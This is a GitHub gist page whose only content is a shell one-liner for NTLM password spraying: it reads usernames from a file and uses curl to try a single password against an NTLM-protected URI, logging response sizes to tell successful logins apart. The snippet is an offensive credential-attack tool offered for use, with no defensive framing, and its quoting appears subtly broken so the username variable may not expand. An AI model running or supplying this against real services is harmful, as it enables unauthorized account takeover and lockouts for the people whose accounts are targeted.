Skip to content

Instantly share code, notes, and snippets.

@WJDigby
Created August 14, 2017 12:21
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save WJDigby/e4245de93d0c0fc46ab025ae48e5db5a to your computer and use it in GitHub Desktop.
Save WJDigby/e4245de93d0c0fc46ab025ae48e5db5a to your computer and use it in GitHub Desktop.
NTLM Authentication password-spraying via curl
while read user; do curl --ntlm -u '"$user":PASSWORD' URI -w 'size: %{size_download}\n' -o /dev/null; done < userlist.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment